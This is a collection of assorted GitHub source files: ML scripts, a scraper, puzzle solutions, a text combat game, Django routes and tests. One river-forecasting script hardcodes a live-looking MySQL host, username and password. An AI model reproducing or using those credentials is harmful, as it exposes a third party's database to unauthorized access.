+{"seq_id":"43934709986","text":"import logging; logging.basicConfig(level=logging.INFO)\nimport tensorflow as tf\nimport pandas as pd\nimport ltn\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--csv-path',type=str,default=None)\n parser.add_argument('--epochs',type=int,default=500)\n parser.add_argument('--batch-size',type=int,default=64)\n args = parser.parse_args()\n dict_args = vars(args)\n return dict_args\n\nargs = parse_args()\nbatch_size = args['batch_size']\nEPOCHS = args['epochs']\ncsv_path = args['csv_path']\n\n\n# # Data\n# \n# Load the real estate dataset\ndf = pd.read_csv(\"real-estate.csv\")\ndf = df.sample(frac=1) #shuffle\n\nx = df[['X1 transaction date', 'X2 house age',\n 'X3 distance to the nearest MRT station',\n 'X4 number of convenience stores', 'X5 latitude', 'X6 longitude']]\ny = df[['Y house price of unit area']]\nds_train = tf.data.Dataset.from_tensor_slices((x[:330],y[:330])).batch(batch_size)\nds_test = tf.data.Dataset.from_tensor_slices((x[330:],y[330:])).batch(batch_size)\n\n\n# # LTN\n#\n# Regressor (trainable)\nf = ltn.Function.MLP(input_shapes=[6],output_shape=[1],hidden_layer_sizes=(8,8))\n# Equality Predicate\neq = ltn.Predicate.Lambda(\n #lambda args: tf.exp(-0.05*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1))) \n lambda args: 1/(1+0.5*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1)))\n)\n\n# Operators and axioms\nNot = ltn.Wrapper_Connective(ltn.fuzzy_ops.Not_Std())\nAnd = ltn.Wrapper_Connective(ltn.fuzzy_ops.And_Prod())\nOr = ltn.Wrapper_Connective(ltn.fuzzy_ops.Or_ProbSum())\nImplies = ltn.Wrapper_Connective(ltn.fuzzy_ops.Implies_Reichenbach())\nForall = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMeanError(p=2),semantics=\"forall\")\nExists = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMean(p=2),semantics=\"exists\")\n@tf.function\ndef axioms(x_data, y_data):\n x = ltn.Variable(\"x\", x_data)\n y = ltn.Variable(\"y\", y_data)\n return Forall(ltn.diag(x,y), eq([f(x),y]))\n\n# Initialize all layers and the static graph\nfor x, y in ds_test:\n print(\"Initial sat level %.5f\"%axioms(x,y))\n break\n\n# # Training\n# \n# Define the metrics. While training, we measure:\n# 1. The level of satisfiability of the Knowledge Base of the training data.\n# 1. The level of satisfiability of the Knowledge Base of the test data.\n# 3. The training accuracy.\n# 4. The test accuracy.\nmetrics_dict = {\n 'train_sat': tf.keras.metrics.Mean(name='train_sat'),\n 'test_sat': tf.keras.metrics.Mean(name='test_sat'),\n 'train_accuracy': tf.keras.metrics.RootMeanSquaredError(name=\"train_accuracy\"),\n 'test_accuracy': tf.keras.metrics.RootMeanSquaredError(name=\"test_accuracy\")\n}\n\n\n# Define the training and test step\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.0005)\n@tf.function\ndef train_step(x, y):\n # sat and update\n with tf.GradientTape() as tape:\n sat = axioms(x, y)\n loss = 1.-sat\n gradients = tape.gradient(loss, f.trainable_variables)\n optimizer.apply_gradients(zip(gradients, f.trainable_variables))\n sat = axioms(x, y)\n metrics_dict['train_sat'](sat)\n # accuracy\n metrics_dict['train_accuracy'](y,f.model(x))\n \n@tf.function\ndef test_step(x, y):\n # sat\n sat = axioms(x, y)\n metrics_dict['test_sat'](sat)\n # accuracy\n metrics_dict['test_accuracy'](y,f.model(x))\n\n# Train\n\nimport commons\n\ncommons.train(\n EPOCHS,\n metrics_dict,\n ds_train,\n ds_test,\n train_step,\n test_step,\n csv_path=csv_path,\n track_metrics=50\n)","repo_name":"logictensornetworks/logictensornetworks","sub_path":"examples/regression/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":229,"dataset":"github-code","pt":"91"}
+{"seq_id":"32548149803","text":"import os\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom pyvirtualdisplay import Display\nimport time\nimport pkg_resources\nimport logging\n\n\nclass Chrome():\n def __init__(self, driver_path):\n # self.display = Display(visible=0, size=(1024, 768))\n # self.display.start()\n\n options = Options()\n # prefs = {\"profile.managed_default_content_sttings.images\": 2}\n # options.add_experimental_option(\"prefs\", prefs)\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-setuid-sandbox\")\n options.add_argument('--disable-gpu')\n # options.add_argument('blink-settings=imagesEnabled=false')\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n self.driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n\n def exit(self):\n # self.display.stop()\n self.driver.quit()\n\n def __del__(self):\n # self.display.stop()\n self.driver.quit()\n\n def scroll2bottom(self):\n self.driver.execute_script(\"window.scrollBy(0, document.documentElement.scrollHeight);\")\n\n @property\n def scroll_height(self):\n return self.driver.execute_script(\"return document.body.scrollHeight\")\n\n def load_list_page(self, url):\n self.driver.get(url)\n while True:\n last_height = self.scroll_height\n self.scroll2bottom()\n time.sleep(10)\n new_height = self.scroll_height\n if last_height == new_height:\n more_button = self.driver.find_element_by_xpath(\"//button[@id='show-more-button']\")\n if more_button.is_displayed():\n more_button.click()\n else:\n break\n last_height = new_height\n html = self.driver.page_source\n if os.environ.get('USERNAME') == 'yetongxue':\n path = '/home/yetongxue/Downloads/tmp/{}.html'.format(url.split('/')[-1])\n with open(path, 'w') as f:\n f.write(html)\n return html\n","repo_name":"astonezml/cnki_patent","sub_path":"utils/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"13446231072","text":"Import(\"env\", \"app_env\", \"rom_env\", \"c_runtime\", \"app_startup\", \"rom_startup\")\n\nquasipixel = env.Object(Split('$ROOT/lib/quasipixel.c $ROOT/lib/qp_render.asm'))\n\nhello = env.Object(\"hello.c\")\n\napp_env.Program(\"hello\", hello + c_runtime + app_startup, LIBS=['c', 'sys'])\nrom_env.Program(\"hello\", hello + c_runtime + rom_startup, LIBS=['c', 'sys'])\n\nsnake = env.Object(Split('snake.c snake_maps.c'))\n\nrom_env.Program('snake_rom', snake + c_runtime + rom_startup + quasipixel, LIBS=['c', 'sys'])\nsnake_app = app_env.Program('snake', snake + c_runtime + app_startup + quasipixel, LIBS=['c', 'sys'])\n\nshell_app = app_env.Program('shell', Split('shell.c lib/more.c') + c_runtime + app_startup, LIBS=['c', 'sys'])\n\nethtest_app = app_env.Program('ethtest', Split('ethtest.c') + c_runtime + app_startup, LIBS=['c', 'sys'])\n\nReturn(\"snake_app shell_app ethtest_app\")\n","repo_name":"imihajlow/ccpu-apps","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"49597986","text":"def get_input(filename):\n data = []\n with open(filename, 'r') as i:\n for x in i.readlines():\n data.append(int(x))\n return data\n\n\ndef count_increases(measurements):\n previous = measurements[0]\n increases = 0\n for measurement in measurements[1:]:\n if measurement > previous:\n increases += 1\n previous = measurement\n return increases\n\n\ndef sliding_window_increases(measurements, window_size):\n previous = sum(measurements[0:window_size])\n increases = 0\n for x in range(1, len(measurements)):\n current = sum(measurements[x:x+window_size])\n if current > previous:\n increases += 1\n previous = current\n return increases\n\n\ndef main():\n measurements = get_input(\"input\")\n print(\"Part 1:\")\n print(count_increases(measurements))\n print()\n print(\"Part 2:\")\n print(sliding_window_increases(measurements, 3))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thetwoj/advent-of-code-2021","sub_path":"day01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"72046602222","text":"import sqlite3\nimport config\nimport os\nimport cgi\nimport leaderboard_db\n\ndef add_leaderboard(titleLeaderboardInput, descriptionInput, genreInput, authorInput):\n conn = sqlite3.connect(config.db_filename)\n \n c = conn.cursor()\n\n titleLeaderboard = titleLeaderboardInput\n description = descriptionInput\n genre = genreInput\n author = authorInput\n\n users = leaderboard_db.get_users()\n\n for user in users:\n if user.Username == author:\n c.execute(\"INSERT INTO Leaderboards(Name, User_Id, Description, Genre) VALUES( ?, ?, ?, ?)\", (str(titleLeaderboard),str(user.User_Id),str(description),str(genre)))\n else:\n c.execute(\"INSERT INTO Leaderboards(Name, User_Id, Description, Genre) VALUES(?, ?, ?, ?)\", (str(titleLeaderboard),str((len(users) + 1)),str(description),str(genre)))\n \n #c.execute(\"INSERT INTO Users(Username, Description, Password) VALUES('Kitty Jacobs','Student at Immaculata Institute', 'aaa')\")\n\n conn.commit()\n c.close()","repo_name":"KittyJac/GIPWebApp","sub_path":"edit_db.py","file_name":"edit_db.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"9577040069","text":"import itertools\nimport logging\nfrom operator import add, mul, sub, truediv\n\nfrom euler.util.decorators import timed_function\n\n\ndef find_combinations(numbers):\n operators = [add, sub, mul, truediv]\n chosen = []\n results = {0}\n\n def helper():\n if len(chosen) == 3:\n first = chosen[0](permutation[0], permutation[1])\n second = chosen[1](first, permutation[2])\n result = chosen[2](second, permutation[3])\n\n # logging.debug(f'{result, permutation, chosen}')\n\n if result % 1 == 0:\n results.add(abs(int(result)))\n\n return\n\n for operator in operators:\n chosen.append(operator)\n helper()\n chosen.pop()\n\n for permutation in map(list, itertools.permutations(numbers)):\n helper()\n\n # logging.debug(f'{numbers, list(sorted(results))}')\n for should_be, element in enumerate(sorted(results)):\n if element != should_be:\n return should_be - 1\n\n return -1\n\n\ndef q93():\n max_permutation, max_ways = [], 0\n for permutation in map(list, itertools.combinations(range(3, 20), 2)):\n permutation = [1, 2] + permutation\n ways = find_combinations(permutation)\n if ways >= max_ways:\n logging.debug(f'{ways, permutation}')\n max_ways = ways\n max_permutation = permutation\n\n return ''.join(map(str, max_permutation))\n\n\nif __name__ == '__main__':\n import sys\n\n logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n assert (timed_function(q93)() == '1258')\n","repo_name":"mgls23/Euler","sub_path":"individual_solutions/p93.py","file_name":"p93.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"30606179628","text":"#输入\nstr1=input()\nstr2=input()\nstr11=str1.split()\nstr22=str2.split()\nn=str11[0]\nm=str11[1]\nbiaoji=\"\"\npaixu=[]\nzuhe=[]\n#计算排列数列\nfor j in str22:\n biaoji=j\n for k in str22:\n if k!=biaoji:\n paixu.append(biaoji+\" \"+k)\n#计算组合数列\nfor jj in range(0,len(str22)):\n biaoji = str22[jj]\n for k in range(jj,len(str22)):\n if str22[k] != biaoji:\n zuhe.append(biaoji + \" \" + str22[k])\n#输出\nprint(\"Permutation:\")\nfor h in paixu:\n print(h)\nprint(\"Combination:\")\nfor h in zuhe:\n print(h)\n\n","repo_name":"wangli-wangli/python","sub_path":"zuoye/homework/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39953125234","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 01:44:36 2017\n\n@author: Junwoo Suh\n\nMain script to run the signal process\nChange inputs to fit your data\n\nSignal preprocess package work flow:\n 1. Process annotation and header files\n 2. Process the record to contain the channels of interest\n 3. Filter the record using notch filter and low pass fileter\n 4. Remove artifact by ICA\n\nFeature extraction package work flow:\n 1. Run Time frequency analysis\n 2. \n\"\"\"\n\nfrom preprocess import io as in_out\nfrom preprocess import process_data\nfrom scipy.fftpack import fft, ifft\nfrom scipy import signal as SIG\nimport pandas as pd\nimport numpy as np\nimport time as clock\nimport scipy.io as spio\nimport os\nimport glob\n\n#Measure time \nt, elapsed = [], []\nt.append(clock.time())\n\"\"\"\n#Use GUI to pick data\nsignal = in_out.open_data()\n\n\"\"\"\n# Just for a debugging purpose\nsignal = process_data.raw_signal('/Users/dohoonkim/Desktop/Research/insomnia/Data/ins1.edf',\n '/Users/dohoonkim/Desktop/Research/insomnia/Data/ins1.txt',\n '/Users/dohoonkim/Desktop/Research/insomnia/Data/header_file.txt')\n\n\n#%% Signal Preprocessing parameters\nsignal.process_annot_n_header()\neeg_ch = ['Fp2-F4','F4-C4','C4-P4','P4-O2','C4-A1']\nemg_ch, ecg_ch, eog_ch = 'EMG1-EMG2','ECG1-ECG2',['ROC-LOC','LOC-ROC']\namerican = False\nh_freq = 60 # Just a testing value. Can try different number under Nyquist Frequency\nbuffer_time = '01:00:00' #Wake time before sleep onset at the beginin and end of the sleep\n\nvisualize = False\nr_thres = 0.8\n\n\n#%% Run signal preprocess\nsignal.process_record(eeg_ch, emg_ch, ecg_ch, eog_ch,american,h_freq,buffer_time)\nsignal.artifact_removal_ICA(visualize,r_thres)\n\n#Measure preprocess time\nelapsed.append(clock.time() - t[-1])\nt.append(clock.time())\n#%% Feature extraction parameters\nNewSig = signal.corrected_data\n#maximum = len(NewSig[0,:])\n#\n#firstSig = NewSig[0,:]\n#secondSig = NewSig[1,:]\n#thirdSig = NewSig[2,:]\n#fourthSig = NewSig[3,:]\n#fifthSig = NewSig[4,:]\n#\n#firstList = [firstSig[x:x+7680] for x in range(0, maximum, 7680)]\n#secondList = [secondSig[x:x+7680] for x in range(0, maximum, 7680)]\n#thirdList = [thirdSig[x:x+7680] for x in range(0, maximum, 7680)]\n#fourthList = [fourthSig[x:x+7680] for x in range(0, maximum, 7680)]\n#fifthList = [fifthSig[x:x+7680] for x in range(0, maximum, 7680)]\n\n#read dataset from matlab file csv\ndelta_path = \"/delta\"\nallFiles = glob.glob(os.path.join(delta_path,\"*.csv\"))\nnp_array_list = []\nfor file_ in allFiles:\n df = pd.read_csv(file_,index_col=None, header=0)\n np_array_list.append(df.as_matrix())\n\ncomb_np_array = np.vstack(np_array_list)\nbig_frame = pd.DataFrame(comb_np_array)\n\nbig_frame.columns = [\"min\",\"max\",\"avg\"]\n\n#for i in range(1,6):\n# for j in range()\n\n\ncol_names = ['delta','theta','alpha','sigma','beta'];\nnewDF = pd.DataFrame(columns = col_names); #creates a new dataframe\nData = NewSig;\n\n\n\n\n#def buffer(x, n, p, opt=None):\n# '''Mimic MATLAB routine to generate buffer array\n#\n# MATLAB docs here: https://se.mathworks.com/help/signal/ref/buffer.html\n#\n# Args\n# ----\n# x: signal array\n# n: number of data segments\n# p: number of values to overlap\n# opt: initial condition options. default sets the first `p` values\n# to zero, while 'nodelay' begins filling the buffer immediately.\n# '''\n# import numpy\n#\n# if p >= n:\n# raise ValueError('p ({}) must be less than n ({}).'.format(p,n))\n#\n# # Calculate number of columns of buffer array\n# cols = int(numpy.ceil(len(x) // int(n-p)))\n#\n# # Check for opt parameters\n# if opt == 'nodelay':\n# # Need extra column to handle additional values left\n# cols += 1\n# elif opt != None:\n# raise SystemError('Only `None` (default initial condition) and '\n# '`nodelay` (skip initial condition) have been '\n# 'implemented')\n#\n# # Create empty buffer array\n# b = numpy.zeros((n, cols))\n# # Fill buffer by column handling for initial condition and overlap\n# j = 0\n# for i in range(int(cols)):\n# # Set first column to n values from x, move to next iteration\n# if i == 0 and opt == 'nodelay':\n# b[0:n,i] = x[0:n]\n# continue\n# # set first values of row to last p values\n# elif i != 0 and p != 0:\n# b[:p, i] = b[-p:, i-1]\n# # If initial condition, set p elements in buffer array to zero\n# else:\n# b[:p, i] = 0\n#\n# # Get stop index positions for x\n# k = j + n - p\n#\n# # Get stop index position for b, matching number sliced from x\n# n_end = p+len(x[j:k])\n#\n# # Assign values to buffer array from x\n# b[p:n_end,i] = x[j:k]\n#\n# # Update start index location for next iteration of x\n# j = k\n#\n# return b\n#\n#NewSig = signal.corrected_data\n#\"\"\"NFFT = [512,256,128]\"\"\"\n#NFFT = 512\n#Output512 = np.zeros((5,7027200))\n#\"\"\"\n#have to modify to incorporate cases for different window sizes\n#Output256 = np.array(5,7027200)\n#Output128 = np.array(5,7027200)\n#\"\"\"\n#\"\"\"for i = 0:2\"\"\"\n#\n#x = np.zeros((5,7027200))\n#X = np.zeros((7027200,1))\n#mean512 = np.zeros((5,NFFT))\n#for j in range(0,5):\n# win = SIG.hamming(NFFT) \n# x[j,:] = NewSig[j,:]\n# pval = int(NFFT//2)\n# bx = buffer(x[j,:],NFFT,pval)\n# bx = bx[:,1:len(bx[0])-1]\n# a = np.diag(win)\n# bx = np.dot((np.transpose(bx)),a)\n# meanFFT = abs(fft(bx,NFFT) / sum(win))\n# mean = meanFFT.mean(0)\n# mean512[j,:] = np.transpose(mean)\n\n\n\n#%% Run feature extraction\n#%%\nimport pandas as pd\nfrom sklearn.decomposition import PCA \n \n#feat_cols = eeg_ch\n#mean512 = np.transpose(mean512) \n#d = {'Fp2-F4': mean512[:,0], 'F4-C4': mean512[:,1], 'C4-P4': mean512[:,2], 'P4-O2': mean512[:,3],'C4-A1': mean512[:,4]}\n#df = pd.DataFrame(data = d, dtype = float)\n#pca = PCA(n_components=3)\n#pca_result = pca.fit_transform(df.values)\n#df['pca-one'] = pca_result[:,0]\n#df['pca-two'] = pca_result[:,1] \n#df['pca-three'] = pca_result[:,2]\n#\n#df1 = df[df.columns[5:8]]\n#\n#print (pca.explained_variance_ratio_)\n#rndperm = np.random.permutation(df.shape[0])\n# \n#\"\"\"\n# df['label'] = eeg_ch\n# df['label'] = df['label'].apply(lambda i: str(i))\n#\n# mean512, eeg_ch = None, None\n# \n# pca = PCA(n_components=3)\n# pca_result = pca.fit_transform(df[feat_cols].values)\n#\n# df['pca-one'] = pca_result[:,0]\n# df['pca-two'] = pca_result[:,1] \n# df['pca-three'] = pca_result[:,2]\n# \n# print (pca.explained_variance_ratio_)\n# \n# rndperm = np.random.permutation(df.shape[0])\n# \n#\"\"\"\n#\"\"\"bx = np.dot((np.transpose(bx)),win)\n#length = len(bx[0])\n#bx = np.transpose(bx).dot(np.diag(win))\n#meanFFT = abs(fft(bx,NFFT) / sum(win))\n#meanFFT = np.mean(meanFFT,2)\n#Output512[j,:] = meanFFT\"\"\"\n\n\n\n","repo_name":"andykim123/Machine-Learning-Approach-to-Classifying-Insomnia-with-EEG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16121675488","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url, include\n\nfrom updater import views\n\nurlpatterns = [\n url(r'^bridge/', include('bridge.urls')),\n url(\n r'^bank/update/(?P\\d+)$',\n views.BankUpdateFileDetailView.as_view(),\n name='bank-update-file'\n ),\n url(\n r'^$',\n views.BankUpdateFileListView.as_view(),\n name='bank-update-file-index'\n ),\n\n url(\n r'^bank/update/(?P\\d+)/procesar$',\n views.BankUpdateFileProcess.as_view(),\n name='bank-update-file-process'\n ),\n\n url(\n r'^bank/list$',\n views.BancoListView.as_view(),\n name='banco-update-list'\n ),\n\n url(\n r'^bank/(?P\\d+)$',\n views.BancoDetailView.as_view(),\n name='banco-update-detail'\n ),\n\n url(\n r'^bank/bill$',\n views.BancoBillingView.as_view(),\n name='banco-bill'\n ),\n\n url(\n r'^bank/client$',\n views.BancoClientView.as_view(),\n name='banco-client'\n ),\n\n url(\n r'^cotizacion/files$',\n views.CotizacionUpdateFileList.as_view(),\n name='cotizacion-file-index'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)/procesar$',\n views.CotizacionUpdateFileProcessView.as_view(),\n name='cotizacion-update-file-process'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)/compare$',\n views.CotizacionUpdateFileCompareView.as_view(),\n name='cotizacion-update-file-compare'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)$',\n views.CotizacionUpdateFileDetailView.as_view(),\n name='cotizacion-update-file'\n ),\n\n url(\n r'^cotizacion/list$',\n views.CotizacionListView.as_view(),\n name='cotizacion-update-list'\n ),\n\n url(\n r'^cotizacion/(?P\\d+)$',\n views.CotizacionDetailView.as_view(),\n name='cotizacion-update-detail'\n ),\n\n url(\n r'^cotizacion/bill$',\n views.CotizacionBillingView.as_view(),\n name='cotizacion-bill'\n ),\n\n url(\n r'^cotizacion/(?P\\d+)/retrasadas/crear$',\n views.RetrasadasCrearView.as_view(),\n name='retrasadas-crear'\n ),\n\n url(\n r'^banco/comparaciones$',\n views.ComparacionBancoListView.as_view(),\n name='compracion-banco-list'\n ),\n\n url(\n r'^banco/comparacion/(?P\\d+)$',\n views.ComparacionBancoDetailView.as_view(),\n name='comparacion-banco-detail'\n ),\n\n url(\n r'^banco/comparacion/(?P\\d+)/procesar$',\n views.ComparacionBancoProcessView.as_view(),\n name='comparacion-banco-process'\n ),\n\n url(\n r'^complemento/(?P\\d+)/cobro$',\n views.BancoFaltanteCobroView.as_view(),\n name='banco-faltante-cobro'\n ),\n\n url(\n r'^complemento/(?P\\d+)/clientes$',\n views.BancoFaltanteClientView.as_view(),\n name='banco-faltante-cliente'\n ),\n\n url(\n r'^complemento/list$',\n views.BancoFaltanteListView.as_view(),\n name='bancofaltante-list'\n ),\n]\n","repo_name":"SpectralAngel/taupdater","sub_path":"updater/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37973244969","text":"import unittest\nfrom Profit import data_manu as dm\n\n\nclass TestProfits(unittest.TestCase):\n\n def setUp(self):\n testprofit = [('bitcoin', '2021-03-19', '$58,243'), # use the lastest date to get today's price to compare to get profit\n ('bitcoin', '2021-03-10', '$56,020'),\n ('ethereum', '2021-03-19', '$1,817.13'), # use the lastest date to get today's price to compare to get profit ,\n ('ethereum', '2021-03-10', '$1,802.31')]\n\n testavgprofit_data = [('bitcoin', '2021-03-19', 0.0), # use data of weekly profit for 2 coins for testing of average profit\n ('bitcoin', '2021-03-18', 0.55), \n ('bitcoin', '2021-03-17', -1.33), \n ('bitcoin', '2021-03-16', 2.43),\n ('bitcoin', '2021-03-15', 4.19), \n ('bitcoin', '2021-03-14', -2.04), \n ('bitcoin', '2021-03-13', -5.27), \n ('bitcoin', '2021-03-12', 1.53),\n ('ethereum', '2021-03-19', 0.0), \n ('ethereum', '2021-03-18', 2.03), \n ('ethereum', '2021-03-17', -0.64),\n ('ethereum', '2021-03-16', 0.47),\n ('ethereum', '2021-03-15', 1.44), \n ('ethereum', '2021-03-14', -2.69), \n ('ethereum', '2021-03-13', -6.09), \n ('ethereum', '2021-03-12', 2.54)]\n\n self.test_profit = testprofit # list of data gotten from SQL \n self.testavg = testavgprofit_data\n\n def test_calprofit(self):\n profit_list = list((0.0,3.82,0.0,0.82)) # as profit is 0 as its using today price as both argument\n price_list = list(('58243','56020','1817.13','1802.31')) # removed $ symbol to be inserted into price list\n date_list =list(('2021-03-19','2021-03-10','2021-03-19','2021-03-10')) # testing for range of dates to be appended into date list\n name_list =list(('bitcoin','bitcoin','ethereum','ethereum')) \n self.assertEqual(dm.cal_profit_dict(self,self.test_profit),(profit_list,price_list,date_list,name_list)) # returning 4 diff array of data to be inserted into SQL\n\n\n def test_avg_profit(self):\n avg_profit_list = list((0.01,-0.35)) #average profit of 2 coins\n coins_list = list(('bitcoin','ethereum')) #coins list\n self.assertEqual(dm.avg_dict(self,self.testavg),(avg_profit_list,coins_list)) # returning 2 arrays using data of individual daily profit of different coins\n\n\nif __name__ == '__main__':\n unittest.main() \n\n\n\n\n","repo_name":"weian31/OOPProject","sub_path":"Web_scraping/FirstLayer/SecondLayer/test_profit.py","file_name":"test_profit.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33772395543","text":"TensionPoints = 0\nimport random\n\n#monster information\nmonster_name = \"Goblin\"\nmonster_health = 50\nplayer_health = 50\nmonster_damage = 2\nprint(f\"You are now fighting {monster_name}! It has {monster_health} health.\")\nprint(f\"You have {player_health} health.\")\n\nwhile monster_health > 0 and player_health > 0:\n #Print the possible moves the user can do\n print(\"You can select one of the following moves:\")\n print(\"slash (1-10 damage)\")\n print(\"stab (4-16 damage)\")\n print(\"\"\"defend (You take the half the damage you would normally take)\n(You also gain 10 Tension Points (TP).\"\"\")\n print(\"dodge (Both sides take no damage) (You also gain 5 TP.)\")\n print(\"fireball (requires 20 TP) (Deals 25-30 damage)\")\n print(\"heal prayer (requires 15 TP) (Heals 8 health)\")\n print(\"\")\n \n #Ask the user to select a move and store as variable\n move = input(\"Choose the move you like to use: \")\n \n #The damage the monster deals\n \n monster_damage = random.randint(4, 7)\n if monster_health < 20:\n print(f\"{monster_name} became enraged! It will now deal triple the damage.\")\n monster_damage = monster_damage * 3\n else:\n chance = random.randint(1, 2)\n if chance == 2:\n print(f\"{monster_name} is preparing something...\")\n \n #What happens for each move\n if move == \"slash\":\n damage = random.randint(1, 10)\n elif move == \"stab\":\n damage = random.randint(4, 6)\n elif move == \"defend\":\n damage = 0\n TensionPoints = TensionPoints + 10\n monster_damage=monster_damage/2\n elif move == \"dodge\":\n damage = 0\n monster_damage = 0\n TensionPoints = TensionPoints + 5\n chance2 = random.randint(1, 3)\n if chance2 == 2:\n print(\"You couldn't dodge in time!\")\n monster_damage = 2\n elif move == \"fireball\":\n if TensionPoints < 20:\n print (\"You do not have enough TP for that.\")\n else:\n damage = random.randint(25, 30)\n elif move == \"heal prayer\":\n if TensionPoints < 15:\n print (\"You do not have enough TP for that.\")\n else:\n player_health = player_health + 8\n print (\"You gained 8 health.\")\n else:\n print (\"That's not a valid move!\\n\")\n continue\n \n #Calculate damage dealt to the monster and subtract from health, also the damage the monster deals to you\n monster_health = monster_health-damage\n if monster_health <= 0:\n break\n player_health = player_health-monster_damage\n if monster_health < 0:\n monster_health = 0\n if player_health < 0:\n player_health = 0\n print(f\"You've dealt {damage} damage! The monster now has {monster_health} health left.\\n\")\n print(f\"The monster dealt {monster_damage} damage! You have {player_health} health left.\")\n\n#if you lose or win\nif player_health == 0:\n print(\"You lost. Better luck next time...\")\nif monster_health == 0:\n print(f\"You defeated {monster_name}!\")\n","repo_name":"Slimenati/PyClass","sub_path":"Python class 10-24-21/combat.py","file_name":"combat.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5293825529","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport calendar\nimport math\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport scipy as sc\nfrom sklearn.preprocessing import MinMaxScaler\nfrom skimage.measure import block_reduce\nfrom sklearn.metrics import mean_absolute_error\nimport io\nimport requests\nfrom metpy.calc import specific_humidity_from_dewpoint\nfrom metpy.units import units\n\nimport mysql.connector\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine\n\nmydb = mysql.connector.connect(\nhost=\"database-1.cccp1zhjxtzi.ap-southeast-1.rds.amazonaws.com\",\nuser=\"admin\",\npassword=\"Nath1234\",\ndatabase= \"rivercast\"\n)\n\nclass initiate_model():\n #IMPORTING\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') # configure GPU utilization\n device\n\n mydb._open_connection()\n query = \"SELECT * FROM rivercast.modelData;\"\n result_dataFrame = pd.read_sql(query, mydb)\n\n print(result_dataFrame.tail(10))\n\n # Specify the column to exclude (change 'column_to_exclude' to the actual column name)\n column_to_exclude = 'Date_Time'\n\n # Exclude the specified column\n df = result_dataFrame.drop(column_to_exclude, axis=1, errors='ignore')\n\n # Print the DataFrame without the excluded column\n\n # Now 'df' can be used as 'mainDataToDB' or for further processing\n\n # convert month name to integer\n\n # create datetime column\n df[['Year', 'Month', 'Day', 'Hour']] = df[['Year', 'Month', 'Day', 'Hour']].astype(int)\n df['Hour'] = df['Hour'].apply(lambda x: x if x < 24 else 0)\n\n # convert year, month, day, and hour columns into timestamp\n df['Datetime'] = df[['Year', 'Month', 'Day', 'Hour']].apply(lambda row: datetime(row['Year'], row['Month'], row['Day'], row['Hour']).isoformat(), axis=1)\n df[\"Datetime\"] = pd.to_datetime(df[\"Datetime\"], format='ISO8601')\n\n # assign timestamps as the data frame index\n df.index = df[\"Datetime\"]\n df = df.drop(['Datetime'], axis=1)\n\n # select the parameters\n df = df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3', 'RF-Intensity', 'RF-Intensity.1', 'RF-Intensity.2', 'RF-Intensity.3', 'Precipitation', 'Precipitation.1', 'Precipitation.2', 'Humidity', 'Humidity.1', 'Humidity.2', 'Temperature', 'Temperature.1', 'Temperature.2']] \n df = df.astype(np.float64) # convert parameters into a double precision floating number\n\n # fill in missing values using linear interpolation\n df = df.interpolate(method='linear', limit_direction='forward')\n df = df.resample('6H').max() # resample dataset using the max value for each 24-hours\n df = df.rolling(120).mean().dropna() # perform moving average smoothing\n\n\n rawData = df\n\n # scale data\n scaler = MinMaxScaler()\n scaler.fit(df)\n # train label scaler\n label_scaler = MinMaxScaler()\n label_scaler.fit(df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3']])\n\n scaled_ds = scaler.transform(df)\n 